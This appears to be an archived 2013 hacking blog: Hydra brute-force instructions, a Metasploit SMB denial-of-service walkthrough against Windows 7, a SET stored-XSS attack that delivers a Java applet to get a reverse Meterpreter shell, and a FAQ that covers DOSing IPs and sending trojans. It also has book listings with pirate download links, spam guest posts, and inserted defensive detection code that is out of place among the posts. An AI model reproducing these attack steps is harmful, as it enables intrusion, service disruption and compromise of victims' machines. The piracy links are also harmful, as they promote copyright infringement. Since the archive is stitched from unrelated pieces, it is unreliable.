Wednesday, January 30, 2013

Brute-Force attack using HYDRA

What is a brute-force attack?


A brute-force attack is a password attack that does not attempt to decrypt any information but simply keeps trying different passwords. For example, a brute-force attack may use a dictionary of all words or a list of commonly used passwords. To gain access to an account, a program tries every word it has available. Another type of brute-force attack is a program that runs through all letters, or letters and numbers, until it gets a match.

How to install THC-Hydra?


Open your terminal and type the following commands:

(1)sudo bash

(2)wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz

(3)After downloading, extract the archive:

tar -xvf hydra-6.3-src.tar.gz

(4)cd hydra-6.3-src

(5)./configure && make

(6)make install


How to use THC-hydra?


If you are attacking an FTP service, first run an nmap scan for any open FTP ports (by default the port is 21).

To brute-force a specific login form you need to define the username (if you don't know it, include a file containing some), the wordlist, the service being attacked, the form method and the page itself.

Type the following command in the terminal:

hydra -l admin -P /root/pass  127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"

The -l switch defines the username, and the capital -L a list of usernames for the brute-force attack (if you don't know the login).

The -p switch defines the password, and the capital -P the wordlist file of passwords to try (-P is used almost always).

If we are attacking a web form over HTTP and the method is POST, we use "http-post-form"; if the service is FTP, simply use "ftp".

Another thing you should be aware of is that the username and password variables are not always named the same. They differ depending on the code.

They could be usr, pwd etc.; they are not necessarily "username" and "password" as in most cases. Just view the page source and check what their names are.

Hydra has many more options. I'll explain some of them below, even though they are included in Hydra's man page.

-vV - The verbose mode. This mode shows you every login attempt hydra tries.

-s - We specify the port on which we're running our attack.

-x - For brute-force password generation. We define the charset and the minimum and maximum password length.

-R - Restores a previously aborted session of an attack.

-e ns - Checks for blank or no password fields.
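
Seen from the defending side, the http-post-form run above appears in the web server's access log as a burst of POST requests to the login page from one address. The following is an added example, not part of the original post, that flags such bursts with a sliding window; the log format, sample lines, threshold and window are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache/Nginx "combined"-style access log line (assumed log format).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"
LOGIN_PAGE = "/mutillidae/index.php?page=login.php"  # form targeted in the post


def build_sample_log():
    """Constructed sample lines (not real traffic)."""
    base = datetime.strptime("30/Jan/2013:10:15:00 +0000", TS_FORMAT)
    rows = []
    # 203.0.113.7: two POSTs per second to the login form for ten seconds.
    for i in range(20):
        rows.append((base + timedelta(seconds=i // 2), "203.0.113.7", "POST", LOGIN_PAGE))
    # 198.51.100.20: one mistyped password, a second try 40 seconds later.
    rows.append((base + timedelta(seconds=3), "198.51.100.20", "POST", LOGIN_PAGE))
    rows.append((base + timedelta(seconds=43), "198.51.100.20", "POST", LOGIN_PAGE))
    # An ordinary page view, which must not count as a login attempt.
    rows.append((base + timedelta(seconds=5), "198.51.100.20", "GET", "/mutillidae/index.php"))
    rows.sort(key=lambda r: r[0])
    # Every response in this sample is 200: a failure marker such as the
    # "Not Logged In" text sits in the body, so attempts are counted instead.
    lines = [
        f'{ip} - - [{ts.strftime(TS_FORMAT)}] "{method} {path} HTTP/1.1" 200 1523'
        for ts, ip, method, path in rows
    ]
    lines.append("this line is truncated or malformed")
    return lines


def detect_login_bursts(lines, login_marker="page=login.php", threshold=10,
                        window=timedelta(seconds=30)):
    """Return {client_ip: peak number of login POSTs seen inside `window`}
    for every client whose peak reaches `threshold`. Lines must be in time order."""
    recent = defaultdict(deque)   # per-client timestamps still inside the window
    peak = defaultdict(int)
    for line in lines:
        m = LINE_RE.match(line)
        if m is None:
            continue  # skip lines that do not parse
        if m["method"] != "POST" or login_marker not in m["path"]:
            continue
        try:
            ts = datetime.strptime(m["ts"], TS_FORMAT)
        except ValueError:
            continue
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()           # drop attempts that fell out of the window
        peak[m["ip"]] = max(peak[m["ip"]], len(q))
    return {ip: count for ip, count in peak.items() if count >= threshold}


if __name__ == "__main__":
    for ip, count in detect_login_bursts(build_sample_log()).items():
        print(f"{ip}: {count} login POSTs inside 30 seconds")
```

The same counter can drive a temporary lockout or a delay for the offending address instead of only a report.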

Tuesday, January 22, 2013

Web application and audit framework

w3af is a complete environment for auditing and attacking web applications. This environment provides a solid platform for web vulnerability assessments and penetration tests.

Download:-

The framework can be downloaded from the project main page: http://www.w3af.com/#download

Installation:-

Some of the requirements are bundled with the distribution file, in order to make the installation process easier for the novice user. The bundled requirements can be found inside the extlib directory. Most of the libraries can be run from that directory, but some others require an installation process. The installation steps for these libraries are (as root):

cd w3af
cd extlib
cd fpconst-0.7.2
python setup.py install
cd ..
cd SOAPpy
python setup.py install
cd ..
cd pyPdf
python setup.py install

Running w3af:-

w3af has two user interfaces, the console user interface (consoleUI) and the graphical user interface (gtkUi). To use the console interface, type:

./w3af_console

w3af>>>

If you are using w3af for the first time, I recommend the graphical user interface:

./w3af_gui

The graphical user interface allows you to perform all the actions that the framework offers and features a much easier and faster way to start a scan and analyze the results.

If you want to know more about plugins and the console interface, here is the document. You can download it.

Sunday, January 20, 2013

Why High-Speed Internet Is Crucial for Efficiency on an E-commerce Site


An ecommerce host plays an important role in the smooth and successful running of your online business. In fact, without an efficient ecommerce hosting solution integrated with your website, you cannot expect an ecommerce business to succeed. Therefore, you must look carefully for high-speed internet connectivity that helps the growth of the ecommerce platform.

Speed
The speed of the different activities on your ecommerce store basically depends on the speed of your ecommerce host's servers. Therefore, you need to ensure that the ecommerce host you have chosen uses a high-speed Internet connection.

Uptime
Speed is not the only thing that matters; the uptime of your ecommerce host's servers matters a lot too. For instance, a customer decides to make a purchase from your online store and is quite happy with the fast shopping experience, but just as he is about to enter the credit card number, the server of the ecommerce site goes down. You can imagine the impression this leaves on the customer. He will not come back to your online store again. Worse situations can arise. Suppose the customer makes the payment and, before he gets the receipt, the server of your ecommerce host goes down. The customer will feel cheated by your website and will eventually lose faith in your business. What can be worse for your business than losing customer trust? Therefore, ensure that you have selected an ecommerce host that offers 24*7 uptime together with a high-speed connection.

Downloading
Easy and quick downloading of visual and audio files, folders, programs and software updates is necessary for any Internet user. With a slow Internet connection it might take hours to download your audio and video files.

Streaming
If there is video or audio on your site, a high-speed Internet connection means you do not have to wait for the file to load or have it come to a standstill halfway. A poor internet connection is quite frustrating in that case.

Method of Payment
Another significant element that determines the efficiency of an ecommerce host is the types of payment it supports. The world of ecommerce is quite advanced today, and your ecommerce website should have a system that lets the online store accept various kinds of payment. Therefore, you need to check whether your ecommerce host can provide your eCommerce site with such a system. A high-speed internet connection will help your customers get through the payment procedure easily and without much hassle.

Phone Access
A high-speed Internet service lets you join the rest of the 21st century in talking on the telephone while using the Internet connection at the same time, without needing a second telephone line.

Smooth Access to Product Detail Page
The product detail page is often the one area where most eCommerce websites fail. You will find great emphasis on the usability and design of the home page, while the same effort is not given to the rest of the website. A user often spends most of his or her time on the product detail page, as all the required information can be found there. If the details on the page are presented strikingly and help the user understand the product better, your eCommerce website will surely be in demand. High-speed Internet connectivity will load the product detail page effortlessly and smoothly.
So, this isn't the 90's anymore. High-speed Internet connectivity helps you multi-task on things like checking your bank account, paying bills, uploading photos and listening to streaming audio. It will also help you keep your sanity, as you do not have to wait for long hours for a page to load. The seven areas mentioned above that benefit from high-speed internet access are Speed, Uptime, Downloading, Streaming, Method of Payment, Phone Access and Product Detail Page.

Therefore, these are the basic reasons why high-speed Internet connectivity is crucial for efficiency on an e-commerce site.

Author Bio:
Donna B. is a career counselor working for a university in the UK. She recommends that everyone should be on the virtual world and stay in touch with all the happenings. If you do not have the internet, you can run a check on what internet providers are available where you live at www.highspeed-internet.com.

DOS attack on windows-7 using metasploit

This module exploits a denial of service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger this bug, run this module as a service and force a vulnerable client to access the IP of this system as an SMB server. This can be accomplished by embedding a UNC path (\\HOST\share\something) into a web page if the target is using Internet Explorer, or a Word document otherwise.

(1)msfconsole

(2)use dos/windows/smb/ms10_006_negotiate_response_loop

(3)show options

(4)set SRVHOST I.P. of local machine 

(5)exploit

[*] Starting the malicious SMB service...

[*] To trigger, the vulnerable client should try to access: \\I.P.\Shared\Anything

[*] Server started.

If the system that accessed that location is vulnerable, it will immediately freeze. To get out of that state, restart the system.
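
The trigger described above depends on a client inside the network opening an SMB session to a server that a UNC path pointed it at. As an added defensive example (not part of the original post), the following flags such outbound sessions in firewall flow records; the CSV layout, field names and addresses are constructed assumptions.

```python
import csv
import io
import ipaddress

SMB_PORTS = {139, 445}  # NetBIOS session service and SMB over TCP

# Address space treated as "ours" (assumption: the RFC 1918 ranges). Listed
# explicitly because ipaddress.is_private also covers documentation ranges.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed firewall flow records (not real traffic).
SAMPLE_FLOWS = """\
time,src,dst,dport,action
2013-01-20T09:00:01,10.0.5.23,10.0.1.10,445,allow
2013-01-20T09:00:07,10.0.5.23,203.0.113.50,445,allow
2013-01-20T09:01:12,10.0.5.40,198.51.100.9,443,allow
2013-01-20T09:02:30,10.0.5.41,203.0.113.50,139,deny
2013-01-20T09:03:00,10.0.5.23,203.0.113.50,445,allow
2013-01-20T09:03:05,bad-row,203.0.113.50,445,allow
2013-01-20T09:04:00,203.0.113.50,10.0.5.23,445,deny
"""


def is_internal(addr):
    """True when the address belongs to one of the internal networks."""
    return any(addr in net for net in INTERNAL_NETS)


def find_outbound_smb(flow_csv):
    """Return {(src, dst): {"allowed", "denied", "first_seen"}} for SMB sessions
    opened by an internal client towards an address outside INTERNAL_NETS."""
    findings = {}
    for row in csv.DictReader(io.StringIO(flow_csv)):
        try:
            src = ipaddress.ip_address(row["src"])
            dst = ipaddress.ip_address(row["dst"])
            dport = int(row["dport"])
        except (KeyError, TypeError, ValueError):
            continue  # malformed record
        if dport not in SMB_PORTS or not is_internal(src) or is_internal(dst):
            continue  # not SMB, not from inside, or stays inside
        entry = findings.setdefault(
            (str(src), str(dst)),
            {"allowed": 0, "denied": 0, "first_seen": row["time"]},
        )
        entry["allowed" if row["action"] == "allow" else "denied"] += 1
    return findings


def needs_attention(findings):
    """Client/server pairs where at least one outbound SMB session got through."""
    return sorted(pair for pair, entry in findings.items() if entry["allowed"] > 0)


if __name__ == "__main__":
    results = find_outbound_smb(SAMPLE_FLOWS)
    for pair in needs_attention(results):
        print(pair, results[pair])
```

Pairs that show only denied sessions mean the perimeter rule for TCP 139/445 is doing its job; allowed ones identify clients that could reach an outside SMB server.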

Wednesday, January 16, 2013

How to exploit stored XSS using S.E.T?


Stored XSS is the most dangerous type of cross-site scripting because the user can be exploited just by visiting the web page where the vulnerability occurs. Also, if that user happens to be the administrator of the website, this can lead to compromise of the web application, which is one of the reasons the risk is higher than with reflected XSS.

(1)First, I recommend you read "How to find XSS in a website?" here.

(2)Open a terminal and type the following commands.
sudo bash
cd /opt/set
./set
(3)Now select option 1, which is Social-Engineering Attacks.
(4)Select option 2, which is website attack vector.
(5)Select option 3, which is Java Applet Attack Method.
(6)Select option 1, Web Templates.
(7)Select option 1, Java Required.
(8)Now we select the payload and encoder. We select the simple Windows Reverse_TCP Meterpreter and shikata_ga_nai encoding.
(9)Set the listener port to 443. Metasploit will now open.
(10)Now we can go back to the web application and try to insert the malicious JavaScript code in the comment field, which we already know from before is vulnerable to XSS.

(11)When a user tries to access the page that contains the malicious JavaScript, the code will be executed in his browser and a new window will come up containing the following message:

(12)After a while the user will notice a pop-up box asking him whether he wants to run the Java applet.

(13)If the user presses the Run button, the malicious code will be executed and it will return us a shell.
(14)sessions -i 1
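
On the defending side, the comment field in step (10) is exploitable only because stored input is written back into the page unescaped. The following added example (not part of the original post) shows a vulnerable render beside an escaped one and audits already-stored comments for active content; the function names and sample comments are constructed assumptions.

```python
import html
from html.parser import HTMLParser

# Constructed comments as they might sit in a comments table (sample data).
STORED_COMMENTS = [
    {"id": 1, "author": "alice", "body": "Nice write-up, thanks!"},
    {"id": 2, "author": "bob", "body": "2 < 3 & that is <b>fine</b>"},
    {"id": 3, "author": "mallory", "body": "<script>alert(1)</script>"},
    {"id": 4, "author": "eve", "body": '<img src="a.png" onerror="alert(1)">'},
    {"id": 5, "author": "trent", "body": '<a href="JavaScript:alert(1)">link</a>'},
]

ACTIVE_TAGS = {"script", "iframe", "object", "embed", "applet"}
URL_ATTRS = {"href", "src", "action", "formaction"}


class ActiveContentFinder(HTMLParser):
    """Collects reasons why a piece of markup would run code in a browser."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.reasons = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names before calling us.
        if tag in ACTIVE_TAGS:
            self.reasons.append(f"<{tag}> element")
        for name, value in attrs:
            if name.startswith("on"):
                self.reasons.append(f"{name} handler on <{tag}>")
            elif name in URL_ATTRS and (value or "").strip().lower().startswith("javascript:"):
                self.reasons.append(f"javascript: URL in {name} on <{tag}>")


def find_active_content(markup):
    """Return the list of active-content findings in a markup string."""
    finder = ActiveContentFinder()
    finder.feed(markup)
    finder.close()
    return finder.reasons


def render_comment_vulnerable(comment):
    # Deliberately vulnerable: stored input is concatenated into the page as-is.
    return f'<div class="comment"><b>{comment["author"]}</b>: {comment["body"]}</div>'


def render_comment_escaped(comment):
    # Hardened: every stored value is HTML-escaped at output time.
    author = html.escape(comment["author"], quote=True)
    body = html.escape(comment["body"], quote=True)
    return f'<div class="comment"><b>{author}</b>: {body}</div>'


def audit_comments(comments):
    """Return {comment id: findings} for stored comments carrying active content."""
    report = {}
    for comment in comments:
        reasons = find_active_content(comment["body"])
        if reasons:
            report[comment["id"]] = reasons
    return report


if __name__ == "__main__":
    for comment_id, reasons in audit_comments(STORED_COMMENTS).items():
        print(comment_id, reasons)
```

The audit is a triage aid for content that is already stored; escaping at output is what removes the vulnerability.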

Tuesday, January 15, 2013

Kingpin: How One Hacker Took Over the Billion-Dollar Cybercrime Underground



ISBN: 0307588688 | 2011 | EPUB/MOBI | 288 pages | 3 MB

Former hacker Kevin Poulsen has, over the past decade, built a reputation as one of the top investigative reporters on the cybercrime beat. In Kingpin, he pours his unmatched access and expertise into book form for the first time, delivering a gripping cat-and-mouse narrative—and an unprecedented view into the twenty-first century's signature form of organized crime.

The word spread through the hacking underground like some unstoppable new virus: Someone—some brilliant, audacious crook—had just staged a hostile takeover of an online criminal network that siphoned billions of dollars from the US economy.

The FBI rushed to launch an ambitious undercover operation aimed at tracking down this new kingpin; other agencies around the world deployed dozens of moles and double agents. Together, the cybercops lured numerous unsuspecting hackers into their clutches. . . . Yet at every turn, their main quarry displayed an uncanny ability to sniff out their snitches and see through their plots.

The culprit they sought was the most unlikely of criminals: a brilliant programmer with a hippie ethic and a supervillain's double identity. As prominent "white-hat" hacker Max "Vision" Butler, he was a celebrity throughout the programming world, even serving as a consultant to the FBI. But as the black-hat "Iceman," he found in the world of data theft an irresistible opportunity to test his outsized abilities. He infiltrated thousands of computers around the country, sucking down millions of credit card numbers at will. He effortlessly hacked his fellow hackers, stealing their ill-gotten gains from under their noses. Together with a smooth-talking con artist, he ran a massive real-world crime ring.

And for years, he did it all with seeming impunity, even as countless rivals ran afoul of police.

Yet as he watched the fraudsters around him squabble, their ranks riddled with infiltrators, their methods inefficient, he began to see in their dysfunction the ultimate challenge: He would stage his coup and fix what was broken, run things as they should be run—even if it meant painting a bull's-eye on his forehead.

Through the story of this criminal's remarkable rise, and of law enforcement's quest to track him down, Kingpin lays bare the workings of a silent crime wave still affecting millions of Americans. In these pages, we are ushered into vast online-fraud supermarkets stocked with credit card numbers, counterfeit checks, hacked bank accounts, dead drops, and fake passports. We learn the workings of the numerous hacks—browser exploits, phishing attacks, Trojan horses, and much more—these fraudsters use to ply their trade, and trace the complex routes by which they turn stolen data into millions of dollars. And thanks to Poulsen's remarkable access to both cops and criminals, we step inside the quiet, desperate arms race that law enforcement continues to fight with these scammers today.

Ultimately, Kingpin is a journey into an underworld of startling scope and power, one in which ordinary American teenagers work hand in hand with murderous Russian mobsters and where a simple Wi-Fi connection can unleash a torrent of gold worth millions.

http://uploaded.net/file/i70o7ijr/kingpin.rar
or
http://ryushare.com/949336dcc41/kingpin.rar

Hacker's Delight (2nd Edition): Collection of Programming Hacks



Henry S. Warren, "Hacker's Delight (2nd Edition)"
English | 2012-10-05 | ISBN: 0321842685 | 512 pages | EPUB + MOBI | 44.84 mb + 41.16 mb


In Hacker’s Delight, Second Edition, Hank Warren once again compiles an irresistible collection of programming hacks: timesaving techniques, algorithms, and tricks that help programmers build more elegant and efficient software, while also gaining deeper insights into their craft. Warren’s hacks are eminently practical, but they’re also intrinsically interesting, and sometimes unexpected, much like the solution to a great puzzle. They are, in a word, a delight to any programmer who is excited by the opportunity to improve.



Extensive additions in this edition include:
- A new chapter on cyclic redundancy checking (CRC), including routines for the commonly used CRC-32 code
- A new chapter on error correcting codes (ECC), including routines for the Hamming code
- More coverage of integer division by constants, including methods using only shifts and adds
- Computing remainders without computing a quotient
- More coverage of population count and counting leading zeros
- Array population count
- New algorithms for compress and expand
- An LRU algorithm
- Floating-point to/from integer conversions
- Approximate floating-point reciprocal square root routine
- A gallery of graphs of discrete functions
- Now with exercises and answers

The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws



English | 2008 | 768 Pages | ISBN: 0470170778 | PDF | 11 MB

This book is a practical guide to discovering and exploiting security flaws in web applications. The authors explain each category of vulnerability using real-world examples, screen shots and code extracts. The book is extremely practical in focus, and describes in detail the steps involved in detecting and exploiting each kind of security weakness found within a variety of applications such as online banking, e-commerce and other web applications.


Download


http://uploaded.net/file/4lmygx2l/wwweb.hck.rar
or
http://ryushare.com/fefzaj0rnvdj/wwweb.hck.rar

Blogging Tips: Things to know how to write inspiring write-ups


Blogging in recent times has emerged as a medium of information sharing, wherein bloggers from distinct streams share their knowledge on a particular topic. The blogging scenario has become extremely competitive as bloggers vie with each other to secure a place in the challenging online world.
To live up to readers' expectations, one needs to write inspiring content of good quality, with effort put in in true earnest.
1.) Qualitative research
To come up with inspirational content that motivates readers to take action, you need to do qualitative research. Understand the perspective of the topic and analyze it from various angles. This will help you come up with authentic information that will help your readers develop a better understanding of the topic.
Qualitative research will help you establish yourself as a niche blog writer and connect better with your readers.
2.) Write niche specific content
In order to come up with inspirational text, one needs to be niche specific. Choose the area of your interest and stick to it. With time and experience on your side, you will be able to bring quality to the content and make it inspirational.
3.) Read a lot
A good blog writer reads a lot. Reading helps you broaden your horizons and learn new facts. These will definitely help you to come up with good text. This will be evident in your writing, and readers will be inspired to connect and share your vision with others.
4.) Discuss with your friends and family
Share your ideas with others in the family. This will help you learn new facts and come up with interesting information for the readers. Amongst your friends and family, you will have people whose interests are similar to yours.
Sharing information with such people will help you to work on new ideas and concepts. Incorporate the learning in your writing. This will make the presentation informative, as real-life ideas and concepts are much more practical and relevant.
5.) Observe people
There is no better learning than practical experience. In our daily life, we meet many people who have distinct ideas and visions. Observe them and you will have many inspirational ideas to share with your readers.
6.) Follow the rules
Do not let the effort you put into qualitative research go to waste. Content writing has some rules. Follow these, or else all your efforts to catch the eye of the reader will go to waste. Optimum keyword usage, short sentences and real-life examples are some of the key requirements if you wish to come up with inspiring content. Sticking to the rule book is the imperative criterion for success, and you need to follow these rules in true earnest.
Blog writing is a creative means of sharing your ideas and thoughts with readers. Follow the steps listed above and you are sure to come up with inspiring text that will catch the eye of the reader and help you to establish your competence in the field.
Author Bio: Brianne is a writer and blogger. She loves writing, travelling and reading books. She contributes to Christopher Ryan Porter

Monday, January 14, 2013

How to view USB History of Windows PC?

USBDeview is a small utility that lists all USB devices that are currently connected to your computer, as well as all USB devices that you previously used.
For each USB device, extended information is displayed: Device name/description, device type, serial number (for mass storage devices), the date/time that device was added, VendorID, ProductID, and more.
USBDeview also allows you to uninstall USB devices that you previously used, disconnect USB devices that are currently connected to your computer, as well as to disable and enable USB devices.

Download USBDeview For X32 System
Download USBDeview For X64 System
You can also use USBDeview on a remote computer, as long as you log in to that computer as an admin user.

Connecting To Remote Computer
The following command-line options allow you to connect to remote computers. You must log in to the remote computer as an admin user in order to use these options.
  • /remote <\\Computer Name>
    Allows you to connect a single remote computer.
    For Example:
    USBDeview.exe /remote \\MyComp
  • /remotefile <Computers List File>
    Allows you to connect multiple computers, and view all their USB activity in one window. The computers list file should be a simple ASCII text file with computer names separated by colon, semicolon, space, tab characters or CRLF.
    For Example:
    USBDeview.exe /remotefile "c:\temp\comp.txt"


In order to successfully get full admin access to the remote computer, read this Blog post: How to connect a remote Windows 7/Vista/XP computer with NirSoft utilities.

Connecting To external SYSTEM registry file

If you have the 'SYSTEM' registry file of an external operating system, you can use the following command-line option to read the USB devices list from it:
/regfile <SYSTEM Registry File>
For Example:
USBDeview.exe /regfile "c:\temp\regfiles\SYSTEM"
USBDeview.exe /regfile "d:\windows\system32\config\SYSTEM"
This option has some limitations:
  • You cannot read a Registry file of Windows XP/2003/Vista from Windows 2000 Machine.
  • USBDeview works in read-only mode. (You cannot uninstall a device from external file)
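
Windows keeps this history in the SYSTEM hive under the Enum\USB and Enum\USBSTOR keys, and the device instance names there carry the fields listed above. The following added example is not USBDeview's code and goes slightly beyond the post: it decodes those names from a text listing of key paths and joins storage devices to their VendorID/ProductID by serial number. The listing format and all sample values are constructed assumptions.

```python
import re

# Constructed key paths in the style of a recursive listing of an offline
# SYSTEM hive (sample data; the serial numbers are made up).
SAMPLE_KEYS = r"""
HKLM\SYSTEM\ControlSet001\Enum\USB\VID_0781&PID_5567\4C530001230101112233
HKLM\SYSTEM\ControlSet001\Enum\USB\VID_046D&PID_C077\5&2a1b3c4d&0&2
HKLM\SYSTEM\ControlSet001\Enum\USBSTOR\Disk&Ven_SanDisk&Prod_Cruzer_Blade&Rev_1.26\4C530001230101112233&0
HKLM\SYSTEM\ControlSet001\Enum\USBSTOR\Disk&Ven_SanDisk&Prod_Cruzer_Blade&Rev_1.26\4C530001230101112233&0\Device Parameters
HKLM\SYSTEM\ControlSet001\Enum\USBSTOR\Disk&Ven_Generic&Prod_Flash_Disk&Rev_8.07\6&1f2e3d4c&0
HKLM\SYSTEM\ControlSet002\Enum\USBSTOR\Disk&Ven_SanDisk&Prod_Cruzer_Blade&Rev_1.26\4C530001230101112233&0
"""

# Enum\USB\VID_xxxx&PID_xxxx\<instance>: one key per device instance.
USB_RE = re.compile(
    r'\\Enum\\USB\\VID_(?P<vid>[0-9A-F]{4})&PID_(?P<pid>[0-9A-F]{4})'
    r'\\(?P<instance>[^\\]+)$', re.I)
# Enum\USBSTOR\<type>&Ven_<vendor>&Prod_<product>&Rev_<rev>\<instance>
USBSTOR_RE = re.compile(
    r'\\Enum\\USBSTOR\\(?P<type>[^&\\]+)&Ven_(?P<vendor>[^&\\]*)'
    r'&Prod_(?P<product>[^&\\]*)&Rev_(?P<rev>[^\\]*)\\(?P<instance>[^\\]+)$', re.I)


def has_generated_id(instance):
    """A '&' as second character means Windows generated the instance ID
    because the device reported no unique serial number."""
    return len(instance) > 1 and instance[1] == "&"


def parse_usb_history(listing):
    """Return one dict per USB storage device found in a key-path listing."""
    vid_pid = {}   # serial -> (VendorID, ProductID), from Enum\USB
    storage = {}   # (vendor, product, rev, instance) -> device type, de-duplicated
    for line in listing.splitlines():
        line = line.strip()
        m = USB_RE.search(line)
        if m:
            if not has_generated_id(m["instance"]):
                vid_pid[m["instance"].upper()] = (m["vid"].upper(), m["pid"].upper())
            continue
        m = USBSTOR_RE.search(line)   # subkeys such as Device Parameters do not match
        if m:
            key = (m["vendor"], m["product"], m["rev"], m["instance"].upper())
            storage.setdefault(key, m["type"])
    devices = []
    for (vendor, product, rev, instance), dev_type in storage.items():
        unique = not has_generated_id(instance)
        # USBSTOR appends "&<n>" to the serial; strip it to get the bare serial.
        serial = instance.rsplit("&", 1)[0] if unique else None
        vid, pid = vid_pid.get(serial, (None, None))
        devices.append({
            "type": dev_type, "vendor": vendor, "product": product,
            "revision": rev, "serial": serial, "unique_serial": unique,
            "vendor_id": vid, "product_id": pid,
        })
    return devices


if __name__ == "__main__":
    for device in parse_usb_history(SAMPLE_KEYS):
        print(device)
```

A device without a unique serial cannot be tied reliably to one physical stick, which matters when the history is used as evidence.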

Sunday, January 13, 2013

Hackers: Heroes of the Computer Revolution (25th Anniversary Edition)



Publisher: O'Reilly Media 2010 | 528 Pages | ISBN: 1449388396 | PDF | 12 MB

This 25th anniversary edition of Steven Levy’s classic book traces the exploits of the computer revolution’s original hackers — those brilliant and eccentric nerds from the late 1950s through the early ’80s who took risks, bent the rules, and pushed the world in a radical new direction. With updated material from noteworthy hackers such as Bill Gates, Mark Zuckerberg, Richard Stallman, and Steve Wozniak, Hackers is a fascinating story that begins in early computer research labs and leads to the first home computers.

Levy profiles the imaginative brainiacs who found clever and unorthodox solutions to computer engineering problems. They had a shared sense of values, known as “the hacker ethic,” that still thrives today. Hackers captures a seminal period in recent history when underground activities blazed a trail for today’s digital world, from MIT students finagling access to clunky computer-card machines to the DIY culture that spawned the Altair and the Apple II.



Saturday, January 12, 2013

Design for Hackers - Reverse Engineering Beauty



2011 | 352 Pages | ISBN: 1119998956 | EPUB | 34 MB

The smash hit introductory design book that debuted at #18 on Amazon

Hackers are able to accomplish so much in so little time because they come from a community that's built upon sharing knowledge. When it comes to programming, they can learn whatever they need to learn by reading manuals, or simply typing in a Google search. But learning design isn't so simple.

Many design books try to teach design through lists of "do's" and "don'ts." But hackers know you need a deeper understanding of something to really do it well. Design for Hackers takes apart design by "reverse-engineering" Impressionist painting, Renaissance sculpture, the Mac OS X Aqua interface, Twitter's web interface, and much more. You'll learn about color theory, typography, proportions, and design principles. This theoretical advice is mixed with concrete, actionable advice such as suggestions for color scheme tools, and a chart of "all of the fonts you'll ever need."
By the end of the book, you'll be seeing design through new eyes.

Friday, January 11, 2013

Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers


Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers By TJ O'Connor

English | November 22, 2012 | ISBN: 1597499579 | 288 pages | PDF | 8 MB

Violent Python shows you how to move from a theoretical understanding of offensive computing concepts to a practical implementation. Instead of relying on another attacker's tools, this book will teach you to forge your own weapons using the Python programming language. This book demonstrates how to write Python scripts to automate large-scale network attacks, extract metadata, and investigate forensic artifacts. It also shows how to write code to intercept and analyze network traffic using Python, craft and spoof wireless frames to attack wireless and Bluetooth devices, and how to data-mine popular social media websites and evade modern anti-virus.


- Demonstrates how to write Python scripts to automate large-scale network attacks, extract metadata, and investigate forensic artifacts.

- Write code to intercept and analyze network traffic using Python. Craft and spoof wireless frames to attack wireless and Bluetooth devices.

- Data-mine popular social media websites and evade modern anti-virus.

Thursday, January 10, 2013

Hacking FAQ: There is no easy way how to hack

Here you can get some hacking tutorials.

Hacking FAQ
****************

How do I hack? -
There is no easy way to hack. Google is your best friend.. REMEMBER THAT! Read any information you can find on hacking. Read hacking forums and check out hacking websites. Learn a programming language like C++. Get a book like Hacking for Dummies, which will teach you a lot.

What do I need to be able to hack? -
First you need to understand how your computer's operating system works, how networks and protocols work, security settings and general PC knowledge. After you understand how it all works, you need hacking tools, which help you to hack.

What is command prompt (cmd - the little DOS window)? -
Go to START, RUN and type in: "cmd"

What can I do in cmd? -
You can do various things with it, like run exploits or do a ping request.


Why do some of the hacking tools I download just close themselves when I open them? -
Lots of hacking tools are DOS-based and have to be run through CMD. If you double-click on the program, it will open a DOS box and automatically close the box. From CMD you can navigate to the directory in which your hacking tool is stored and run it from there. Other hacking tools are GUI (graphical user interface) based and will open like a normal Windows-based program.

What is an IP address? -
Every computer connected to the Internet or some network has an IP address. Go to START, RUN and type in "cmd", then type in "ipconfig"; it will show you your IP address or addresses. It will look something like this: 81.35.99.84. IP = Internet Protocol.

What can I do with an IP? -
Well, you need someone's IP before you can hack, portscan or DOS them.

What is IP ping? -
It's a command you can use to check if someone's IP address is online, that is, whether they are connected to the Internet or a network. In command prompt type in "ping 192.168.0.21" - this will show you something like this:
____________________________________________________________
Pinging 192.168.0.21 with 32 bytes of data:
Reply from 192.168.0.21: bytes=32 time<1ms TTL=128
Reply from 192.168.0.21: bytes=32 time<1ms TTL=128
Reply from 192.168.0.21: bytes=32 time<1ms TTL=128
Reply from 192.168.0.21: bytes=32 time<1ms TTL=128
Ping statistics for 192.168.0.21:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
____________________________________________________________

That means you can successfully PING IP 192.168.0.21, which means the IP is online. If you get a message "request timed out", it means the IP is not online.
Bytes=32 is the amount of data which was sent to the host.
Time<1ms is the time the host took to reply.


Why can't I ping a certain IP? -
Either the IP is not online/in use, or the person you're trying to ping is running a firewall which blocks ping requests, or maybe your firewall is blocking outgoing ping requests.

What is 127.0.0.1 IP? -
It is your PC's local loopback IP address.

Why do I have two IP addresses when I do an ipconfig? -
Well, if you're on a local LAN (local area network) you will have an IP like 192.168.0.1. If you're also directly connected to the Internet you will have another IP address like 80.87.34.56. 192.168.0.1 is your local IP, which you use to communicate with your local network (LAN), and 80.87.34.56 is your Internet IP.


What is a static and dynamic IP address? -
Static means a permanently set IP address - a website, for example, will have a static IP address; it never changes. Dynamic means a temporary IP address - dialing up to the Internet with a modem or most ADSL connections have dynamic IPs. Every time you log on to the Internet your ISP (Internet Service Provider) will issue you a new IP address.


I have sent someone a trojan but I cannot connect to their PC? -
Either they are running a firewall which blocks you from connecting to their PC, or they are connected to the internet through a router.

